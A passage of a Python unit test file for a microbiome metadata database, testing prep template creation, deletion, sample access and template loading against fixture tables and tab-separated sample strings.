exp = [['1.SKB7.640196', 'Value for sample 3', 'ILLUMINA',
's_G1_L002_sequences', 'CCTCTGAGAGCT', None,
'GTGCCAGCMGCCGCGGTAA', 'BBBB', 'AAAA'],
['1.SKB8.640193', 'Value for sample 1', 'ILLUMINA',
's_G1_L001_sequences', 'GTCCGCAAGTTA', None,
'GTGCCAGCMGCCGCGGTAA', 'BBBB', 'AAAA'],
['1.SKD8.640184', 'Value for sample 2', 'ILLUMINA',
's_G1_L001_sequences', 'CGTAGAGCTCTC', None,
'GTGCCAGCMGCCGCGGTAA', 'BBBB', 'AAAA']]
self.assertEqual(sorted(obs), sorted(exp))
# prep and qiime files have been created
filepaths = pt.get_filepaths()
self.assertEqual(len(filepaths), 2)
self.assertEqual(filepaths[0][0], 22)
self.assertEqual(filepaths[1][0], 21)
def test_create_already_prefixed_samples(self):
"""Creates a new PrepTemplate"""
pt = npt.assert_warns(QiitaDBWarning, PrepTemplate.create,
self.metadata_prefixed, self.new_raw_data,
self.test_study, self.data_type)
# The returned object has the correct id
self.assertEqual(pt.id, 2)
# The row in the prep template table has been created
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.prep_template WHERE prep_template_id=2")
# prep_template_id, data_type_id, raw_data_id, preprocessing_status,
# investigation_type
self.assertEqual(obs, [[2, 2, 5, 'not_preprocessed', None]])
# The relevant rows to common_prep_info have been added.
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.common_prep_info WHERE prep_template_id=2")
# prep_template_id, sample_id, study_id, center_name,
# center_project_name, emp_status_id
exp = [[2, '1.SKB8.640193', 'ANL', 'Test Project', 1],
[2, '1.SKD8.640184', 'ANL', 'Test Project', 1],
[2, '1.SKB7.640196', 'ANL', 'Test Project', 1]]
self.assertEqual(sorted(obs), sorted(exp))
# The relevant rows have been added to the prep_columns table
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.prep_columns WHERE prep_template_id=2")
# prep_template_id, column_name, column_type
exp = [[2, 'str_column', 'varchar'],
[2, 'ebi_submission_accession', 'varchar'],
[2, 'run_prefix', 'varchar'],
[2, 'barcodesequence', 'varchar'],
[2, 'linkerprimersequence', 'varchar'],
[2, 'platform', 'varchar'],
[2, 'experiment_design_description', 'varchar'],
[2, 'library_construction_protocol', 'varchar']]
self.assertEqual(sorted(obs), sorted(exp))
# The new table exists
self.assertTrue(exists_table("prep_2", self.conn_handler))
# The new table hosts the correct values
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.prep_2")
# sample_id, study_id, str_column, ebi_submission_accession,
# run_prefix, barcodesequence, linkerprimersequence
exp = [['1.SKB7.640196', 'Value for sample 3', 'ILLUMINA',
's_G1_L002_sequences', 'CCTCTGAGAGCT', None,
'GTGCCAGCMGCCGCGGTAA', 'BBBB', 'AAAA'],
['1.SKB8.640193', 'Value for sample 1', 'ILLUMINA',
's_G1_L001_sequences', 'GTCCGCAAGTTA', None,
'GTGCCAGCMGCCGCGGTAA', 'BBBB', 'AAAA'],
['1.SKD8.640184', 'Value for sample 2', 'ILLUMINA',
's_G1_L001_sequences', 'CGTAGAGCTCTC', None,
'GTGCCAGCMGCCGCGGTAA', 'BBBB', 'AAAA']]
self.assertEqual(sorted(obs), sorted(exp))
# prep and qiime files have been created
filepaths = pt.get_filepaths()
self.assertEqual(len(filepaths), 2)
self.assertEqual(filepaths[0][0], 22)
self.assertEqual(filepaths[1][0], 21)
def test_create_qiime_mapping_file(self):
pt = PrepTemplate(1)
# creating prep template file
_id, fp = get_mountpoint('templates')[0]
fpp = join(fp, '%d_prep_%d_%s.txt' % (pt.study_id, pt.id,
strftime("%Y%m%d-%H%M%S")))
pt.to_file(fpp)
pt.add_filepath(fpp)
_, filepath = pt.get_filepaths()[0]
obs_fp = pt.create_qiime_mapping_file(filepath)
exp_fp = join(fp, '1_prep_1_qiime_19700101-000000.txt')
obs = pd.read_csv(obs_fp, sep='\t', infer_datetime_format=True,
parse_dates=True, index_col=False, comment='\t')
exp = pd.read_csv(exp_fp, sep='\t', infer_datetime_format=True,
parse_dates=True, index_col=False, comment='\t')
assert_frame_equal(obs, exp)
# testing failure, first lest remove some lines of the prep template
with open(filepath, 'r') as filepath_fh:
data = filepath_fh.read().splitlines()
with open(filepath, 'w') as filepath_fh:
for i, d in enumerate(data):
if i == 4:
# adding fake sample
line = d.split('\t')
line[0] = 'fake_sample'
line = '\t'.join(line)
filepath_fh.write(line + '\n')
break
filepath_fh.write(d + '\n')
with self.assertRaises(ValueError):
pt.create_qiime_mapping_file(filepath)
def test_create_data_type_id(self):
"""Creates a new PrepTemplate passing the data_type_id"""
pt = PrepTemplate.create(self.metadata, self.new_raw_data,
self.test_study, self.data_type_id)
# The returned object has the correct id
self.assertEqual(pt.id, 2)
# The row in the prep template table have been created
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.prep_template WHERE prep_template_id=2")
# prep_template_id, data_type_id, raw_data_id, preprocessing_status,
# investigation_type
self.assertEqual(obs, [[2, 2, 5, 'not_preprocessed', None]])
# The relevant rows to common_prep_info have been added.
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.common_prep_info WHERE prep_template_id=2")
# prep_template_id, sample_id, center_name,
# center_project_name, emp_status_id
exp = [[2, '1.SKB8.640193', 'ANL', 'Test Project', 1],
[2, '1.SKD8.640184', 'ANL', 'Test Project', 1],
[2, '1.SKB7.640196', 'ANL', 'Test Project', 1]]
self.assertEqual(sorted(obs), sorted(exp))
# The relevant rows have been added to the prep_columns table
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.prep_columns WHERE prep_template_id=2")
# prep_template_id, column_name, column_type
exp = [[2, 'str_column', 'varchar'],
[2, 'ebi_submission_accession', 'varchar'],
[2, 'run_prefix', 'varchar'],
[2, 'barcodesequence', 'varchar'],
[2, 'linkerprimersequence', 'varchar'],
[2, 'platform', 'varchar'],
[2, 'experiment_design_description', 'varchar'],
[2, 'library_construction_protocol', 'varchar']]
self.assertEqual(sorted(obs), sorted(exp))
# The new table exists
self.assertTrue(exists_table("prep_2", self.conn_handler))
# The new table hosts the correct values
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.prep_2")
# sample_id, str_column, ebi_submission_accession,
# run_prefix, barcodesequence, linkerprimersequence
exp = [['1.SKB7.640196', 'Value for sample 3', 'ILLUMINA',
's_G1_L002_sequences', 'CCTCTGAGAGCT', None,
'GTGCCAGCMGCCGCGGTAA', 'BBBB', 'AAAA'],
['1.SKB8.640193', 'Value for sample 1', 'ILLUMINA',
's_G1_L001_sequences', 'GTCCGCAAGTTA', None,
'GTGCCAGCMGCCGCGGTAA', 'BBBB', 'AAAA'],
['1.SKD8.640184', 'Value for sample 2', 'ILLUMINA',
's_G1_L001_sequences', 'CGTAGAGCTCTC', None,
'GTGCCAGCMGCCGCGGTAA', 'BBBB', 'AAAA']]
self.assertEqual(sorted(obs), sorted(exp))
def test_create_error(self):
"""Create raises an error if any required columns are missing
"""
metadata_dict = {
'1.SKB8.640193': {'center_name': 'ANL',
'center_project_name': 'Test Project',
'ebi_submission_accession': None,
'EMP_status_id': 1,
'str_column': 'Value for sample 1'},
'1.SKD8.640184': {'center_name': 'ANL',
'center_project_name': 'Test Project',
'ebi_submission_accession': None,
'EMP_status_id': 1,
'str_column': 'Value for sample 2'},
'1.SKB7.640196': {'center_name': 'ANL',
'center_project_name': 'Test Project',
'ebi_submission_accession': None,
'EMP_status_id': 1,
'str_column': 'Value for sample 3'}
}
metadata = pd.DataFrame.from_dict(metadata_dict, orient='index')
with self.assertRaises(QiitaDBColumnError):
PrepTemplate.create(metadata, self.new_raw_data, self.test_study,
self.data_type)
def test_create_error_template_special(self):
"""Create raises an error if not all columns are on the template"""
metadata_dict = {
'1.SKB8.640193': {'center_name': 'ANL',
'center_project_name': 'Test Project',
'ebi_submission_accession': None,
'EMP_status': 'EMP',
'str_column': 'Value for sample 1',
'barcodesequence': 'GTCCGCAAGTTA'},
'1.SKD8.640184': {'center_name': 'ANL',
'center_project_name': 'Test Project',
'ebi_submission_accession': None,
'EMP_status': 'EMP',
'str_column': 'Value for sample 2',
'barcodesequence': 'CGTAGAGCTCTC'},
'1.SKB7.640196': {'center_name': 'ANL',
'center_project_name': 'Test Project',
'ebi_submission_accession': None,
'EMP_status': 'EMP',
'str_column': 'Value for sample 3',
'barcodesequence': 'CCTCTGAGAGCT'}
}
metadata = pd.DataFrame.from_dict(metadata_dict, orient='index')
with self.assertRaises(QiitaDBColumnError):
PrepTemplate.create(metadata, self.new_raw_data, self.test_study,
self.data_type)
def test_create_investigation_type_error(self):
"""Create raises an error if the investigation_type does not exists"""
with self.assertRaises(QiitaDBColumnError):
PrepTemplate.create(self.metadata, self.new_raw_data,
self.test_study, self.data_type_id,
'Not a term')
def test_delete_error(self):
"""Try to delete a prep template that already has preprocessed data"""
with self.assertRaises(QiitaDBExecutionError):
PrepTemplate.delete(1)
def test_delete_unkonwn_id_error(self):
"""Try to delete a non existent prep template"""
with self.assertRaises(QiitaDBUnknownIDError):
PrepTemplate.delete(5)
def test_delete(self):
"""Deletes prep template 2"""
pt = PrepTemplate.create(self.metadata, self.new_raw_data,
self.test_study, self.data_type_id)
PrepTemplate.delete(pt.id)
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.prep_template WHERE prep_template_id=2")
exp = []
self.assertEqual(obs, exp)
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.common_prep_info WHERE prep_template_id=2")
exp = []
self.assertEqual(obs, exp)
obs = self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.prep_columns WHERE prep_template_id=2")
exp = []
self.assertEqual(obs, exp)
with self.assertRaises(QiitaDBExecutionError):
self.conn_handler.execute_fetchall(
"SELECT * FROM qiita.prep_2")
def test_exists_true(self):
"""Exists returns true when the PrepTemplate already exists"""
self.assertTrue(PrepTemplate.exists(1))
def test_exists_false(self):
"""Exists returns false when the PrepTemplate does not exists"""
self.assertFalse(PrepTemplate.exists(2))
def test_get_sample_ids(self):
"""get_sample_ids returns the correct set of sample ids"""
obs = self.tester._get_sample_ids(self.conn_handler)
self.assertEqual(obs, self.exp_sample_ids)
def test_len(self):
"""Len returns the correct number of sample ids"""
self.assertEqual(len(self.tester), 27)
def test_getitem(self):
"""Get item returns the correct sample object"""
obs = self.tester['1.SKM7.640188']
exp = PrepSample('1.SKM7.640188', self.tester)
self.assertEqual(obs, exp)
def test_getitem_error(self):
"""Get item raises an error if key does not exists"""
with self.assertRaises(KeyError):
self.tester['Not_a_Sample']
def test_setitem(self):
"""setitem raises an error (currently not allowed)"""
with self.assertRaises(QiitaDBNotImplementedError):
self.tester['1.SKM7.640188'] = PrepSample('1.SKM7.640188',
self.tester)
def test_delitem(self):
"""delitem raises an error (currently not allowed)"""
with self.assertRaises(QiitaDBNotImplementedError):
del self.tester['1.SKM7.640188']
def test_iter(self):
"""iter returns an iterator over the sample ids"""
obs = self.tester.__iter__()
self.assertTrue(isinstance(obs, Iterable))
self.assertEqual(set(obs), self.exp_sample_ids)
def test_contains_true(self):
"""contains returns true if the sample id exists"""
self.assertTrue('1.SKM7.640188' in self.tester)
def test_contains_false(self):
"""contains returns false if the sample id does not exists"""
self.assertFalse('Not_a_Sample' in self.tester)
def test_keys(self):
"""keys returns an iterator over the sample ids"""
obs = self.tester.keys()
self.assertTrue(isinstance(obs, Iterable))
self.assertEqual(set(obs), self.exp_sample_ids)
def test_values(self):
"""values returns an iterator over the values"""
obs = self.tester.values()
self.assertTrue(isinstance(obs, Iterable))
exp = {PrepSample('1.SKB1.640202', self.tester),
PrepSample('1.SKB2.640194', self.tester),
PrepSample('1.SKB3.640195', self.tester),
PrepSample('1.SKB4.640189', self.tester),
PrepSample('1.SKB5.640181', self.tester),
PrepSample('1.SKB6.640176', self.tester),
PrepSample('1.SKB7.640196', self.tester),
PrepSample('1.SKB8.640193', self.tester),
PrepSample('1.SKB9.640200', self.tester),
PrepSample('1.SKD1.640179', self.tester),
PrepSample('1.SKD2.640178', self.tester),
PrepSample('1.SKD3.640198', self.tester),
PrepSample('1.SKD4.640185', self.tester),
PrepSample('1.SKD5.640186', self.tester),
PrepSample('1.SKD6.640190', self.tester),
PrepSample('1.SKD7.640191', self.tester),
PrepSample('1.SKD8.640184', self.tester),
PrepSample('1.SKD9.640182', self.tester),
PrepSample('1.SKM1.640183', self.tester),
PrepSample('1.SKM2.640199', self.tester),
PrepSample('1.SKM3.640197', self.tester),
PrepSample('1.SKM4.640180', self.tester),
PrepSample('1.SKM5.640177', self.tester),
PrepSample('1.SKM6.640187', self.tester),
PrepSample('1.SKM7.640188', self.tester),
PrepSample('1.SKM8.640201', self.tester),
PrepSample('1.SKM9.640192', self.tester)}
# Creating a list and looping over it since unittest does not call
# the __eq__ function on the objects
for o, e in zip(sorted(list(obs), key=lambda x: x.id),
sorted(exp, key=lambda x: x.id)):
self.assertEqual(o, e)
def test_items(self):
"""items returns an iterator over the (key, value) tuples"""
obs = self.tester.items()
self.assertTrue(isinstance(obs, Iterable))
exp = [('1.SKB1.640202', PrepSample('1.SKB1.640202', self.tester)),
('1.SKB2.640194', PrepSample('1.SKB2.640194', self.tester)),
('1.SKB3.640195', PrepSample('1.SKB3.640195', self.tester)),
('1.SKB4.640189', PrepSample('1.SKB4.640189', self.tester)),
('1.SKB5.640181', PrepSample('1.SKB5.640181', self.tester)),
('1.SKB6.640176', PrepSample('1.SKB6.640176', self.tester)),
('1.SKB7.640196', PrepSample('1.SKB7.640196', self.tester)),
('1.SKB8.640193', PrepSample('1.SKB8.640193', self.tester)),
('1.SKB9.640200', PrepSample('1.SKB9.640200', self.tester)),
('1.SKD1.640179', PrepSample('1.SKD1.640179', self.tester)),
('1.SKD2.640178', PrepSample('1.SKD2.640178', self.tester)),
('1.SKD3.640198', PrepSample('1.SKD3.640198', self.tester)),
('1.SKD4.640185', PrepSample('1.SKD4.640185', self.tester)),
('1.SKD5.640186', PrepSample('1.SKD5.640186', self.tester)),
('1.SKD6.640190', PrepSample('1.SKD6.640190', self.tester)),
('1.SKD7.640191', PrepSample('1.SKD7.640191', self.tester)),
('1.SKD8.640184', PrepSample('1.SKD8.640184', self.tester)),
('1.SKD9.640182', PrepSample('1.SKD9.640182', self.tester)),
('1.SKM1.640183', PrepSample('1.SKM1.640183', self.tester)),
('1.SKM2.640199', PrepSample('1.SKM2.640199', self.tester)),
('1.SKM3.640197', PrepSample('1.SKM3.640197', self.tester)),
('1.SKM4.640180', PrepSample('1.SKM4.640180', self.tester)),
('1.SKM5.640177', PrepSample('1.SKM5.640177', self.tester)),
('1.SKM6.640187', PrepSample('1.SKM6.640187', self.tester)),
('1.SKM7.640188', PrepSample('1.SKM7.640188', self.tester)),
('1.SKM8.640201', PrepSample('1.SKM8.640201', self.tester)),
('1.SKM9.640192', PrepSample('1.SKM9.640192', self.tester))]
# Creating a list and looping over it since unittest does not call
# the __eq__ function on the objects
for o, e in zip(sorted(list(obs)), sorted(exp)):
self.assertEqual(o, e)
def test_get(self):
"""get returns the correct PrepSample object"""
obs = self.tester.get('1.SKM7.640188')
exp = PrepSample('1.SKM7.640188', self.tester)
self.assertEqual(obs, exp)
def test_get_none(self):
"""get returns none if the sample id is not present"""
self.assertTrue(self.tester.get('Not_a_Sample') is None)
def test_to_file(self):
"""to file writes a tab delimited file with all the metadata"""
fd, fp = mkstemp()
close(fd)
pt = PrepTemplate.create(self.metadata, self.new_raw_data,
self.test_study, self.data_type)
pt.to_file(fp)
self._clean_up_files.append(fp)
with open(fp, 'U') as f:
obs = f.read()
self.assertEqual(obs, EXP_PREP_TEMPLATE)
def test_data_type(self):
"""data_type returns the string with the data_type"""
self.assertTrue(self.tester.data_type(), "18S")
def test_data_type_id(self):
"""data_type returns the int with the data_type_id"""
self.assertTrue(self.tester.data_type(ret_id=True), 2)
def test_raw_data(self):
"""Returns the raw_data associated with the prep template"""
self.assertEqual(self.tester.raw_data, 1)
def test_preprocessed_data(self):
"""Returns the preprocessed data list generated from this template"""
self.assertEqual(self.tester.preprocessed_data, [1, 2])
def test_preprocessing_status(self):
"""preprocessing_status works correctly"""
# Success case
pt = PrepTemplate(1)
self.assertEqual(pt.preprocessing_status, 'success')
# not preprocessed case
pt = PrepTemplate.create(self.metadata, self.new_raw_data,
self.test_study, self.data_type_id)
self.assertEqual(pt.preprocessing_status, 'not_preprocessed')
def test_preprocessing_status_setter(self):
"""Able to update the preprocessing status"""
pt = PrepTemplate.create(self.metadata, self.new_raw_data,
self.test_study, self.data_type_id)
self.assertEqual(pt.preprocessing_status, 'not_preprocessed')
pt.preprocessing_status = 'preprocessing'
self.assertEqual(pt.preprocessing_status, 'preprocessing')
pt.preprocessing_status = 'success'
self.assertEqual(pt.preprocessing_status, 'success')
def test_preprocessing_status_setter_failed(self):
"""Able to update preprocessing_status with a failure message"""
pt = PrepTemplate.create(self.metadata, self.new_raw_data,
self.test_study, self.data_type_id)
state = 'failed: some error message'
self.assertEqual(pt.preprocessing_status, 'not_preprocessed')
pt.preprocessing_status = state
self.assertEqual(pt.preprocessing_status, state)
def test_preprocessing_status_setter_valueerror(self):
"""Raises an error if the status is not recognized"""
with self.assertRaises(ValueError):
self.tester.preprocessing_status = 'not a valid state'
def test_investigation_type(self):
"""investigation_type works correctly"""
self.assertEqual(self.tester.investigation_type, "Metagenomics")
def test_investigation_type_setter(self):
"""Able to update the investigation type"""
pt = PrepTemplate.create(self.metadata, self.new_raw_data,
self.test_study, self.data_type_id)
self.assertEqual(pt.investigation_type, None)
pt.investigation_type = "Other"
self.assertEqual(pt.investigation_type, 'Other')
with self.assertRaises(QiitaDBColumnError):
pt.investigation_type = "should fail"
def test_investigation_type_instance_setter(self):
pt = PrepTemplate(1)
pt.investigation_type = 'RNASeq'
self.assertEqual(pt.investigation_type, 'RNASeq')
class TestUtilities(TestCase):
def test_load_template_to_dataframe(self):
obs = load_template_to_dataframe(StringIO(EXP_SAMPLE_TEMPLATE))
exp = pd.DataFrame.from_dict(SAMPLE_TEMPLATE_DICT_FORM)
exp.index.name = 'sample_name'
assert_frame_equal(obs, exp)
def test_load_template_to_dataframe_duplicate_cols(self):
obs = load_template_to_dataframe(
StringIO(EXP_SAMPLE_TEMPLATE_DUPE_COLS))
obs = list(obs.columns)
exp = ['collection_timestamp', 'description', 'has_extracted_data',
'has_physical_specimen', 'host_subject_id', 'latitude',
'longitude', 'physical_location', 'required_sample_info_status',
'sample_type', 'str_column', 'str_column']
self.assertEqual(obs, exp)
def test_load_template_to_dataframe_scrubbing(self):
obs = load_template_to_dataframe(StringIO(EXP_SAMPLE_TEMPLATE_SPACES))
exp = pd.DataFrame.from_dict(SAMPLE_TEMPLATE_DICT_FORM)
exp.index.name = 'sample_name'
assert_frame_equal(obs, exp)
def test_load_template_to_dataframe_empty_columns(self):
obs = npt.assert_warns(QiitaDBWarning, load_template_to_dataframe,
StringIO(EXP_ST_SPACES_EMPTY_COLUMN))
exp = pd.DataFrame.from_dict(SAMPLE_TEMPLATE_DICT_FORM)
exp.index.name = 'sample_name'
assert_frame_equal(obs, exp)
def test_load_template_to_dataframe_empty_rows(self):
obs = load_template_to_dataframe(
StringIO(EXP_SAMPLE_TEMPLATE_SPACES_EMPTY_ROW))
exp = pd.DataFrame.from_dict(SAMPLE_TEMPLATE_DICT_FORM)
exp.index.name = 'sample_name'
assert_frame_equal(obs, exp)
def test_load_template_to_dataframe_no_sample_name_cast(self):
obs = load_template_to_dataframe(
StringIO(EXP_SAMPLE_TEMPLATE_NUMBER_SAMPLE_NAMES))
exp = pd.DataFrame.from_dict(
SAMPLE_TEMPLATE_NUMBER_SAMPLE_NAMES_DICT_FORM)
exp.index.name = 'sample_name'
obs.sort_index(inplace=True)
exp.sort_index(inplace=True)
assert_frame_equal(obs, exp)
def test_load_template_to_dataframe_empty_sample_names(self):
obs = load_template_to_dataframe(
StringIO(SAMPLE_TEMPLATE_NO_SAMPLE_NAMES))
exp = pd.DataFrame.from_dict(SAMPLE_TEMPLATE_DICT_FORM)
exp.index.name = 'sample_name'
assert_frame_equal(obs, exp)
obs = load_template_to_dataframe(
StringIO(SAMPLE_TEMPLATE_NO_SAMPLE_NAMES_SOME_SPACES))
exp = pd.DataFrame.from_dict(SAMPLE_TEMPLATE_DICT_FORM)
exp.index.name = 'sample_name'
assert_frame_equal(obs, exp)
def test_load_template_to_dataframe_empty_column(self):
obs = npt.assert_warns(QiitaDBWarning, load_template_to_dataframe,
StringIO(SAMPLE_TEMPLATE_EMPTY_COLUMN))
exp = pd.DataFrame.from_dict(ST_EMPTY_COLUMN_DICT_FORM)
exp.index.name = 'sample_name'
assert_frame_equal(obs, exp)
def test_load_template_to_dataframe_column_with_nas(self):
obs = load_template_to_dataframe(
StringIO(SAMPLE_TEMPLATE_COLUMN_WITH_NAS))
exp = pd.DataFrame.from_dict(ST_COLUMN_WITH_NAS_DICT_FORM)
exp.index.name = 'sample_name'
assert_frame_equal(obs, exp)
def test_load_template_to_dataframe_exception(self):
with self.assertRaises(QiitaDBColumnError):
x = load_template_to_dataframe(
StringIO(SAMPLE_TEMPLATE_NO_SAMPLE_NAME))
# prevent flake8 from complaining
x.strip()
def test_load_template_to_dataframe_whitespace(self):
obs = load_template_to_dataframe(
StringIO(EXP_SAMPLE_TEMPLATE_WHITESPACE))
exp = pd.DataFrame.from_dict(SAMPLE_TEMPLATE_DICT_FORM)
exp.index.name = 'sample_name'
assert_frame_equal(obs, exp)
def test_get_invalid_sample_names(self):
all_valid = ['2.sample.1', 'foo.bar.baz', 'roses', 'are', 'red',
'v10l3t5', '4r3', '81u3']
obs = get_invalid_sample_names(all_valid)
self.assertEqual(obs, [])
all_valid = ['sample.1', 'sample.2', 'SAMPLE.1', 'BOOOM']
obs = get_invalid_sample_names(all_valid)
self.assertEqual(obs, [])
def test_get_invalid_sample_names_str(self):
one_invalid = ['2.sample.1', 'foo.bar.baz', 'roses', 'are', 'red',
'I am the chosen one', 'v10l3t5', '4r3', '81u3']
obs = get_invalid_sample_names(one_invalid)
self.assertItemsEqual(obs, ['I am the chosen one'])
one_invalid = ['2.sample.1', 'foo.bar.baz', 'roses', 'are', 'red',
':L{=<', ':L}=<', '4r3', '81u3']
obs = get_invalid_sample_names(one_invalid)
self.assertItemsEqual(obs, [':L{=<', ':L}=<'])
def test_get_get_invalid_sample_names_mixed(self):
one_invalid = ['.', '1', '2']
obs = get_invalid_sample_names(one_invalid)
self.assertItemsEqual(obs, [])
one_invalid = [' ', ' ', ' ']
obs = get_invalid_sample_names(one_invalid)
self.assertItemsEqual(obs, [' ', ' ', ' '])
def test_invalid_lat_long(self):
with self.assertRaises(QiitaDBColumnError):
obs = load_template_to_dataframe(
StringIO(SAMPLE_TEMPLATE_INVALID_LATITUDE_COLUMNS))
# prevent flake8 from complaining
str(obs)
with self.assertRaises(QiitaDBColumnError):
obs = load_template_to_dataframe(
StringIO(SAMPLE_TEMPLATE_INVALID_LONGITUDE_COLUMNS))
# prevent flake8 from complaining
str(obs)
EXP_SAMPLE_TEMPLATE = (
"sample_name\tcollection_timestamp\tdescription\thas_extracted_data\t"
"has_physical_specimen\thost_subject_id\tint_column\tlatitude\tlongitude\t"
"physical_location\trequired_sample_info_status\tsample_type\tstr_column\n"
"2.Sample1\t2014-05-29 12:24:51\tTest Sample 1\tTrue\tTrue\tNotIdentified"
"\t1\t42.42\t41.41\tlocation1\treceived\ttype1\tValue for sample 1\n"
"2.Sample2\t2014-05-29 12:24:51\tTest Sample 2\tTrue\tTrue\tNotIdentified"
"\t2\t4.2\t1.1\tlocation1\treceived\ttype1\tValue for sample 2\n"
"2.Sample3\t2014-05-29 12:24:51\tTest Sample 3\tTrue\tTrue\tNotIdentified"
"\t3\t4.8\t4.41\tlocation1\treceived\ttype1\tValue for sample 3\n")
EXP_SAMPLE_TEMPLATE_DUPE_COLS = (
"sample_name\tcollection_timestamp\tdescription\thas_extracted_data\t"
"has_physical_specimen\thost_subject_id\tlatitude\tlongitude\t"
"physical_location\trequired_sample_info_status\tsample_type\t"
"str_column\tstr_column\n"
"2.Sample1\t2014-05-29 12:24:51\tTest Sample 1\tTrue\tTrue\t"
"NotIdentified\t42.42\t41.41\tlocation1\treceived\ttype1\t"
"Value for sample 1\tValue for sample 1\n"
"2.Sample2\t2014-05-29 12:24:51\t"
"Test Sample 2\tTrue\tTrue\tNotIdentified\t4.2\t1.1\tlocation1\treceived\t"
"type1\tValue for sample 2\tValue for sample 2\n"
"2.Sample3\t2014-05-29 12:24:51\tTest Sample 3\tTrue\t"
"True\tNotIdentified\t4.8\t4.41\tlocation1\treceived\ttype1\t"
"Value for sample 3\tValue for sample 3\n")
EXP_SAMPLE_TEMPLATE_FEWER_SAMPLES = (
"sample_name\tcollection_timestamp\tdescription\thas_extracted_data\t"
"has_physical_specimen\thost_subject_id\tint_column\tlatitude\t"
"longitude\tphysical_location\trequired_sample_info_status\tsample_type\t"
"str_column\n"
"2.Sample1\t2014-05-29 12:24:51\tTest Sample 1\tTrue\tTrue\tNotIdentified"
"\t1\t42.42\t41.41\tlocation1\treceived\ttype1\tValue for sample 1\n"
"2.Sample3\t2014-05-29 12:24:51\tTest Sample 3\tTrue\tTrue\tNotIdentified"
"\t3\t4.8\t4.41\tlocation1\treceived\ttype1\tValue for sample 3\n")
EXP_SAMPLE_TEMPLATE_SPACES = (
"sample_name\tcollection_timestamp\tdescription\thas_extracted_data\t"
"has_physical_specimen\thost_subject_id\tint_column\tlatitude\tlongitude\t"
"physical_location\trequired_sample_info_status\tsample_type\t"
"str_column\n"
"2.Sample1 \t2014-05-29 12:24:51\tTest Sample 1\tTrue\tTrue\t"
"NotIdentified\t1\t42.42\t41.41\tlocation1\treceived\ttype1\t"
"Value for sample 1\n"
"2.Sample2 \t2014-05-29 12:24:51\t"
"Test Sample 2\tTrue\tTrue\tNotIdentified\t2\t4.2\t1.1\tlocation1\t"
"received\ttype1\tValue for sample 2\n"
"2.Sample3\t2014-05-29 12:24:51\tTest Sample 3\tTrue\t"
"True\tNotIdentified\t3\t4.8\t4.41\tlocation1\treceived\ttype1\t"
"Value for sample 3\n")
EXP_SAMPLE_TEMPLATE_WHITESPACE = (
"sample_name \tcollection_timestamp\t description \thas_extracted_data\t"
"has_physical_specimen\thost_subject_id\tint_column\tlatitude\tlongitude\t"
"physical_location\trequired_sample_info_status\tsample_type\t"
"str_column\n"
"2.Sample1\t2014-05-29 12:24:51\tTest Sample 1\tTrue\tTrue\t"
"NotIdentified\t1\t42.42\t41.41\tlocation1\treceived\ttype1\t"
"Value for sample 1\n"
"2.Sample2\t 2014-05-29 12:24:51 \t"
"Test Sample 2\tTrue\tTrue\tNotIdentified\t2\t4.2\t1.1\tlocation1\t"
"received\ttype1\t Value for sample 2\n"
"2.Sample3\t2014-05-29 12:24:51\t Test Sample 3 \tTrue\t"
"True\tNotIdentified\t3\t4.8\t4.41\tlocation1\treceived\ttype1\t"
"Value for sample 3\n")
EXP_SAMPLE_TEMPLATE_SPACES_EMPTY_ROW = (
"sample_name\tcollection_timestamp\tdescription\thas_extracted_data\t"
"has_physical_specimen\thost_subject_id\tint_column\tlatitude\tlongitude\t"
"physical_location\trequired_sample_info_status\tsample_type\t"
"str_column\n"
"2.Sample1 \t2014-05-29 12:24:51\tTest Sample 1\tTrue\tTrue\t"
"NotIdentified\t1\t42.42\t41.41\tlocation1\treceived\ttype1\t"
"Value for sample 1\n"
"2.Sample2 \t2014-05-29 12:24:51\t"
"Test Sample 2\tTrue\tTrue\tNotIdentified\t2\t4.2\t1.1\tlocation1\t"
"received\ttype1\tValue for sample 2\n"
"2.Sample3\t2014-05-29 12:24:51\tTest Sample 3\tTrue\t"
"True\tNotIdentified\t3\t4.8\t4.41\tlocation1\treceived\ttype1\t"
"Value for sample 3\n"
"\t\t\t\t\t\t\t\t\t\t\t\t\n"
"\t\t\t\t\t\t\t\t\t\t\t\t\n")
EXP_ST_SPACES_EMPTY_COLUMN = (
"sample_name\tcollection_timestamp\tdescription\thas_extracted_data\t"
"has_physical_specimen\thost_subject_id\tint_column\tlatitude\tlongitude\t"
"physical_location\trequired_sample_info_status\tsample_type\t"
"str_column\t\n"
"2.Sample1 \t2014-05-29 12:24:51\tTest Sample 1\tTrue\tTrue\t"
"NotIdentified\t1\t42.42\t41.41\tlocation1\treceived\ttype1\t"
"Value for sample 1\t\n"
"2.Sample2 \t2014-05-29 12:24:51\t"
"Test Sample 2\tTrue\tTrue\tNotIdentified\t2\t4.2\t1.1\tlocation1\t"
"received\ttype1\tValue for sample 2\t\n"
"2.Sample3\t2014-05-29 12:24:51\tTest Sample 3\tTrue\t"
"True\tNotIdentified\t3\t4.8\t4.41\tlocation1\treceived\ttype1\t"
"Value for sample 3\t\n")
EXP_SAMPLE_TEMPLATE_NUMBER_SAMPLE_NAMES = (
"sample_name\tcollection_timestamp\tdescription\thas_extracted_data\t"
"has_physical_specimen\thost_subject_id\tlatitude\tlongitude\t"
"physical_location\trequired_sample_info_status\tsample_type\t"
"str_column\n"
"002.000\t2014-05-29 12:24:51\tTest Sample 1\tTrue\tTrue\t"
"NotIdentified\t42.42\t41.41\tlocation1\treceived\ttype1\t"
"Value for sample 1\n"
"1.11111\t2014-05-29 12:24:51\t"
"Test Sample 2\tTrue\tTrue\tNotIdentified\t4.2\t1.1\tlocation1\treceived\t"
"type1\tValue for sample 2\n"
"0.12121\t2014-05-29 12:24:51\tTest Sample 3\tTrue\t"
"True\tNotIdentified\t4.8\t4.41\tlocation1\treceived\ttype1\t"
"Value for sample 3\n")
SAMPLE_TEMPLATE_NO_SAMPLE_NAMES = (
"sample_name\tcollection_timestamp\tdescription\thas_extracted_data\t"
